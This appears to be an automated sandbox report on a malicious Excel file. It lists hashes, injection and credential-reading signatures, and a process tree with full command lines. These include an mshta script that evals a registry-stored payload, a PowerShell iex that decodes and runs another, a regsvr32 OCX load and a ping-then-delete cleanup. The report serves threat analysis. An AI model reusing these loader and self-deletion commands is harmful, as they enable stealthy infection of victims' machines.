Analysis
- max time kernel: 150s
- max time network: 140s
- platform: windows10_x64
- resource: win10
- submitted: 14-07-2020 05:18
Static task: static1
Behavioral task: behavioral1
Sample: tr_4.xls
Resource: win7
General
- Target: tr_4.xls
- Size: 90KB
- MD5: 4cabdfd852c1c7fe830508cec8dd0982
- SHA1: ee530e442bdf28a4834bca1922be2dd54761c6d5
- SHA256: 7bbbb364b218aa3da80f1c8e8e43e389a71811dcf1d1fe63be8e7a85a3ac0fd0
- SHA512: a6ec25d43a123a9a9b7f5005a7acd7b9bad3f3142f0b29d9c43b993fabec22e8926f29f324e85a050ed832a2c4c594802906705ed89ac7460e818188c0b8cd2a
Malware Config
Signatures
-
Suspicious behavior: MapViewOfSection 6 IoCs
Processes:
pid  process
3376 powershell.exe
3020 Explorer.EXE
3020 Explorer.EXE
3020 Explorer.EXE
2232 cmd.exe
3020 Explorer.EXE
-
Runs ping.exe 1 TTPs 1 IoCs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
EXCEL.EXE: Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS
EXCEL.EXE: Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily
EXCEL.EXE: Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU
-
Suspicious use of WriteProcessMemory 76 IoCs
Processes:
source pid/process -> target pid/process (number of entries in the listing)
3684 EXCEL.EXE -> 2588 regsvr32.exe (2)
2588 regsvr32.exe -> 2640 regsvr32.exe (3)
2640 regsvr32.exe -> 1008 svchost.exe (5)
1008 svchost.exe -> 1204 cmd.exe (3)
1008 svchost.exe -> 1492 svchost.exe (5)
1008 svchost.exe -> 1756 BN2D25.tmp (3)
1900 iexplore.exe -> 4004 IEXPLORE.EXE (3)
1900 iexplore.exe -> 3448 IEXPLORE.EXE (3)
3732 mshta.exe -> 3376 powershell.exe (2)
3376 powershell.exe -> 4024 csc.exe (2)
4024 csc.exe -> 1160 cvtres.exe (2)
3376 powershell.exe -> 912 csc.exe (2)
912 csc.exe -> 3184 cvtres.exe (2)
3376 powershell.exe -> 3020 Explorer.EXE (4)
3020 Explorer.EXE -> 3392 RuntimeBroker.exe (2)
3020 Explorer.EXE -> 2232 cmd.exe (3)
3020 Explorer.EXE -> 3392 RuntimeBroker.exe (2)
3020 Explorer.EXE -> 1900 iexplore.exe (2)
3020 Explorer.EXE -> 2232 cmd.exe (2)
3020 Explorer.EXE -> 1900 iexplore.exe (2)
2232 cmd.exe -> 484 PING.EXE (5)
3020 Explorer.EXE -> 3464 cmd.exe (2)
3020 Explorer.EXE -> 3480 cmd.exe (2)
3480 cmd.exe -> 1964 nslookup.exe (1)
-
Suspicious behavior: EnumeratesProcesses 1925 IoCs
Processes:
pid  process (number of entries in the listing)
1008 svchost.exe (4)
2144 WerFault.exe (15)
3376 powershell.exe (3)
3020 Explorer.EXE (42)
-
Suspicious use of FindShellTrayWindow 3 IoCs
Processes:
pid  process
1900 iexplore.exe
1900 iexplore.exe
1900 iexplore.exe
-
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process
pid 2588 regsvr32.exe, spawned by pid 3684 EXCEL.EXE
-
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
Processes:
pid process
484 PING.EXE
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow 21: api.ipify.org
-
Suspicious use of SetWindowsHookEx 24 IoCs
Processes:
pid  process (number of entries in the listing)
3684 EXCEL.EXE (12)
1900 iexplore.exe (2)
4004 IEXPLORE.EXE (2)
1900 iexplore.exe (2)
3448 IEXPLORE.EXE (2)
1900 iexplore.exe (2)
4004 IEXPLORE.EXE (2)
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
pid  process
3684 EXCEL.EXE
-
Checks for installed software on the system 1 TTPs 7 IoCs
Processes:
svchost.exe: Key enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall
svchost.exe: Key value queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome\DisplayName
svchost.exe: Key value queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\DisplayName
svchost.exe: Key value queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\DisplayName
svchost.exe: Key value queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}\DisplayName
svchost.exe: Key value queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\DisplayName
svchost.exe: Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall
-
Executes dropped EXE 1 IoCs
Processes:
pid  process
1756 BN2D25.tmp
-
Program crash 1 IoCs
Processes:
pid 2144 WerFault.exe, crashed process: pid 2640 regsvr32.exe
-
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
EXCEL.EXE: Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0
EXCEL.EXE: Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz
EXCEL.EXE: Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString
-
Checks whether UAC is enabled 3 IoCs
Processes:
IEXPLORE.EXE: Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA
IEXPLORE.EXE: Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA
iexplore.exe: Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA
-
Loads dropped DLL 1 IoCs
Processes:
pid  process
2640 regsvr32.exe
-
Suspicious use of SetThreadContext 8 IoCs
Processes:
source pid/process -> target pid/process
2640 regsvr32.exe set thread context of 1008 svchost.exe
1008 svchost.exe set thread context of 1492 svchost.exe
3376 powershell.exe set thread context of 3020 Explorer.EXE
3020 Explorer.EXE set thread context of 3392 RuntimeBroker.exe
3020 Explorer.EXE set thread context of 2232 cmd.exe
3020 Explorer.EXE set thread context of 1900 iexplore.exe
2232 cmd.exe set thread context of 484 PING.EXE
3020 Explorer.EXE set thread context of 2332 WinMail.exe
-
Suspicious use of AdjustPrivilegeToken 96 IoCs
Processes:
pid 1008 svchost.exe, token privileges adjusted (the sequence of eight is listed five times):
SeImpersonatePrivilege, SeTcbPrivilege, SeChangeNotifyPrivilege, SeCreateTokenPrivilege, SeBackupPrivilege, SeRestorePrivilege, SeIncreaseQuotaPrivilege, SeAssignPrimaryTokenPrivilege
pid 1492 svchost.exe, token privileges adjusted (the same sequence of eight, listed three times):
SeImpersonatePrivilege, SeTcbPrivilege, SeChangeNotifyPrivilege, SeCreateTokenPrivilege, SeBackupPrivilege, SeRestorePrivilege, SeIncreaseQuotaPrivilege, SeAssignPrimaryTokenPrivilege
Processes
-
Path: C:\Windows\Explorer.EXE (depth 1)
Command line: C:\Windows\Explorer.EXE
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetThreadContext
-
Path: C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE (depth 2)
Command line: "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\tr_4.xls"
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
- Suspicious use of SetWindowsHookEx
- Suspicious behavior: AddClipboardFormatListener
- Checks processor information in registry
-
Path: C:\Windows\System32\regsvr32.exe (depth 3)
Command line: "C:\Windows\System32\regsvr32.exe" /s /i dDdoiBj.ocx
- Suspicious use of WriteProcessMemory
- Process spawned unexpected child process
-
Path: C:\Windows\SysWOW64\regsvr32.exe (depth 4)
Command line: /s /i dDdoiBj.ocx
- Suspicious use of WriteProcessMemory
- Loads dropped DLL
- Suspicious use of SetThreadContext
-
Path: C:\Windows\SysWOW64\svchost.exe (depth 5)
Command line: C:\Windows\System32\svchost.exe
- Suspicious use of WriteProcessMemory
- Suspicious behavior: EnumeratesProcesses
- Checks for installed software on the system
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
-
Path: C:\Windows\SysWOW64\cmd.exe (depth 6)
Command line: cmd /K
-
Path: C:\Windows\SysWOW64\svchost.exe (depth 6)
Command line: C:\Windows\System32\svchost.exe
- Suspicious use of AdjustPrivilegeToken
-
Path: C:\Users\Admin\AppData\Local\Temp\BN2D25.tmp (depth 6)
Command line: C:\Users\Admin\AppData\Local\Temp\BN2D25.tmp
- Executes dropped EXE
-
Path: C:\Windows\SysWOW64\WerFault.exe (depth 5)
Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 2640 -s 668
- Suspicious behavior: EnumeratesProcesses
- Program crash
-
Path: C:\Windows\System32\mshta.exe (depth 2)
Command line: "C:\Windows\System32\mshta.exe" "about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\2FFAFA40-C261-3936-44D3-167DB8B7AA01\\\Addrient'));if(!window.flag)close()</script>"
- Suspicious use of WriteProcessMemory
-
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (depth 3)
Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex ([System.Text.Encoding]::ASCII.GetString(( gp "HKCU:Software\AppDataLow\Software\Microsoft\2FFAFA40-C261-3936-44D3-167DB8B7AA01").appiness))
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetThreadContext
-
Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe (depth 4)
Command line: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\2uf0qoog\2uf0qoog.cmdline"
- Suspicious use of WriteProcessMemory
-
Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe (depth 5)
Command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9277.tmp" "c:\Users\Admin\AppData\Local\Temp\2uf0qoog\CSC34BDC6584AD24D90853E8CE642A0B1BC.TMP"
-
Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe (depth 4)
Command line: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\mswhtq3l\mswhtq3l.cmdline"
- Suspicious use of WriteProcessMemory
-
Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe (depth 5)
Command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9313.tmp" "c:\Users\Admin\AppData\Local\Temp\mswhtq3l\CSC34B0182361C643F483B2E23F8A9FC592.TMP"
-
Path: C:\Windows\System32\cmd.exe (depth 2)
Command line: "C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\Admin\AppData\Local\Temp\BN2D25.tmp"
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
- Suspicious use of SetThreadContext
-
Path: C:\Windows\system32\PING.EXE (depth 3)
Command line: ping localhost -n 5
- Runs ping.exe
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
Path: C:\Windows\system32\cmd.exe (depth 2)
Command line: cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\Admin\AppData\Local\Temp\1ACE.bi1"
-
Path: C:\Windows\system32\nslookup.exe (depth 3)
Command line: nslookup myip.opendns.com resolver1.opendns.com
-
Path: C:\Windows\system32\cmd.exe (depth 2)
Command line: cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\Admin\AppData\Local\Temp\D3E.bi1"
- Suspicious use of WriteProcessMemory
-
Path: C:\Windows\system32\nslookup.exe (depth 3)
Command line: nslookup myip.opendns.com resolver1.opendns.com
-
Path: C:\Windows\system32\cmd.exe (depth 2)
Command line: cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\1ACE.bi1"
-
Path: C:\Windows\system32\cmd.exe (depth 2)
Command line: cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\D3E.bi1"
-
Path: C:\Program Files\Windows Mail\WinMail.exe (depth 2)
Command line: "C:\Program Files\Windows Mail\WinMail" OCInstallUserConfigOE
-
Path: C:\Windows\System32\RuntimeBroker.exe (depth 1)
Command line: C:\Windows\System32\RuntimeBroker.exe -Embedding
-
Path: C:\Program Files\Internet Explorer\iexplore.exe (depth 1)
Command line: "C:\Program Files\Internet Explorer\iexplore.exe" -Embedding
- Suspicious use of WriteProcessMemory
- Suspicious use of FindShellTrayWindow
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
- Checks whether UAC is enabled
-
Path: C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE (depth 2)
Command line: "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1900 CREDAT:82945 /prefetch:2
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
- Checks whether UAC is enabled
-
Path: C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE (depth 2)
Command line: "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1900 CREDAT:82952 /prefetch:2
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
- Checks whether UAC is enabled
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\6BADA8974A10C4BD62CC921D13E43B18_D9817BD5013875AD517DA73475345203
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6BADA8974A10C4BD62CC921D13E43B18_D9817BD5013875AD517DA73475345203
-
C:\Users\Admin\AppData\Local\Temp\1ACE.bi1
-
C:\Users\Admin\AppData\Local\Temp\1ACE.bi1
-
C:\Users\Admin\AppData\Local\Temp\2uf0qoog\2uf0qoog.dll
-
C:\Users\Admin\AppData\Local\Temp\BN2D25.tmp
-
C:\Users\Admin\AppData\Local\Temp\BN2D25.tmp
-
C:\Users\Admin\AppData\Local\Temp\D3E.bi1
-
C:\Users\Admin\AppData\Local\Temp\D3E.bi1
-
C:\Users\Admin\AppData\Local\Temp\RES9277.tmp
-
C:\Users\Admin\AppData\Local\Temp\RES9313.tmp
-
C:\Users\Admin\AppData\Local\Temp\mswhtq3l\mswhtq3l.dll
-
C:\Users\Admin\Documents\dDdoiBj.ocx
-
\??\c:\Users\Admin\AppData\Local\Temp\2uf0qoog\2uf0qoog.0.cs
-
\??\c:\Users\Admin\AppData\Local\Temp\2uf0qoog\2uf0qoog.cmdline
-
\??\c:\Users\Admin\AppData\Local\Temp\2uf0qoog\CSC34BDC6584AD24D90853E8CE642A0B1BC.TMP
-
\??\c:\Users\Admin\AppData\Local\Temp\mswhtq3l\CSC34B0182361C643F483B2E23F8A9FC592.TMP
-
\??\c:\Users\Admin\AppData\Local\Temp\mswhtq3l\mswhtq3l.0.cs
-
\??\c:\Users\Admin\AppData\Local\Temp\mswhtq3l\mswhtq3l.cmdline
-
\Users\Admin\Documents\dDdoiBj.ocx